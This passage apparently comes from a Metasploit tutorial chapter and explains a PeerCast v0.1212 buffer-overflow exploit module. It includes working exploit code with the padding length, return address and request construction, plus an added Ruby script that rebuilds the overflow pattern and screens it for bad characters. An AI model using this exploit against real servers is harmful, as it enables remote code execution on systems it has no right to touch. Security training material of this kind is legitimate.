'Payload' =>
  {
    'Space'    => 200,
    'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
    'MinNops'  => 64,
  },
NOTE These bad characters make sense in the context of a URL-based exploit: the
payload travels in the request line of an HTTP GET, so any byte that would terminate
the string or be parsed as part of the URI has to be excluded. They are the NULL
terminator, line feed, carriage return, the space character, /, =, and ;.
Chapter 4: Using Metasploit
After the payload information comes the target information. This exploit targets
Linux systems running one specific version of PeerCast (v0.1212), and includes the
return address for that version.
'Platform' => 'linux',
'Arch'     => ARCH_X86,
'Targets'  =>
  [
    ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
  ],
The final bit of initialization information is the set of default variables. PeerCast
Streaming Server by default runs on 7144/tcp, so the exploit by default sets RPORT
to 7144.
register_options( [ Opt::RPORT(7144) ], self.class )
Lastly, the module includes the Ruby code to trigger the vulnerability.
def exploit
  connect                                    # framework opens the TCP session to RHOST:RPORT
  pat = rand_text_alphanumeric(780)          # 780 bytes of filler before the return address
  pat << [target.ret].pack('V')              # the target's Ret as a little-endian DWORD
  pat << payload.encoded                     # encoded payload, free of the BadChars above
  uri = '/stream/?' + pat
  res = "GET #{uri} HTTP/1.0\r\n\r\n"        # the pattern rides in the request line
  print_status("Trying target address 0x%.8x..." % target.ret)
  sock.put(res)                              # send the request that triggers the overflow
  handler                                    # start the payload handler for the connection back
  disconnect
end
The connection setup is handled by the framework, allowing exploits to include a
simple connect and then focus on the vulnerability.
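The exploit method above trusts the framework to deliver a payload that contains none of the BadChars, and it never checks the pattern itself. The following is an added example, not code from the book or from the Metasploit PeerCast module: it rebuilds the same padding | return address | payload layout with the constants on this page and runs a bad-character check over the pattern before it would go on the wire. The rand_text_alphanumeric stand-in, the BadCharError class and the sample payloads are assumptions made here; the offsets, the return address and the BadChars list are the module's.

```ruby
# Added example (not from the book or the Metasploit module): rebuild the
# PeerCast request pattern and check it against the module's BadChars.
require 'securerandom'

PADDING_LEN   = 780          # rand_text_alphanumeric(780) in the module
TARGET_RET    = 0x080922f7   # 'Ret' for the PeerCast v0.1212 target
PAYLOAD_SPACE = 200          # 'Space' from the module's Payload hash
# BadChars exactly as the module lists them (\x0d appears twice; uniq drops the repeat).
BAD_CHARS = "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b".bytes.uniq.freeze

class BadCharError < StandardError; end   # assumption: not a framework class

ALNUM = [*'A'..'Z', *'a'..'z', *'0'..'9'].freeze

# Stand-in (assumption) for the framework's rand_text_alphanumeric; binary string.
def rand_text_alphanumeric(len)
  Array.new(len) { ALNUM[SecureRandom.random_number(ALNUM.size)] }.join.b
end

# Returns [offset, byte] pairs for every bad byte found in buf; empty when clean.
def find_bad_chars(buf, bad = BAD_CHARS)
  buf.bytes.each_with_index
     .select { |byte, _| bad.include?(byte) }
     .map    { |byte, off| [off, byte] }
end

# padding | ret (little-endian DWORD) | payload, in the order the module builds it
def build_pattern(payload, ret: TARGET_RET, pad_len: PADDING_LEN)
  raise ArgumentError, "payload exceeds Space (#{PAYLOAD_SPACE})" if payload.bytesize > PAYLOAD_SPACE
  pat = rand_text_alphanumeric(pad_len)
  pat << [ret].pack('V')
  pat << payload.b
  pat
end

# The BadChars constraint applies to the pattern only: the GET line around it
# legitimately contains spaces and CRLF, so the framing is not checked.
def build_request(payload, **opts)
  pat = build_pattern(payload, **opts)
  bad = find_bad_chars(pat)
  raise BadCharError, "bad bytes at #{bad.inspect}" unless bad.empty?
  "GET /stream/?".b + pat + " HTTP/1.0\r\n\r\n".b
end

if $PROGRAM_NAME == __FILE__
  # Constructed inputs: a clean stub, and the raw "/bin/sh" string an unencoded
  # shellcode carries. '/' is 0x2f, a bad byte, which is why the module sends
  # payload.encoded instead of raw shellcode.
  req = build_request("\x90".b * 16)
  puts "request is #{req.bytesize} bytes; ret sits at pattern offset #{PADDING_LEN}"
  begin
    build_request("/bin/sh".b)
  rescue BadCharError => e
    puts "rejected: #{e.message}"
  end
end
```

The check is deliberately limited to the pattern: the request line must contain 0x20 and CRLF, so screening the whole request would always fail. The return address 0x080922f7 packs to f7 22 09 08, none of which is in the list, so only the payload can introduce a bad byte; that is the job the framework's encoder does for `payload.encoded`.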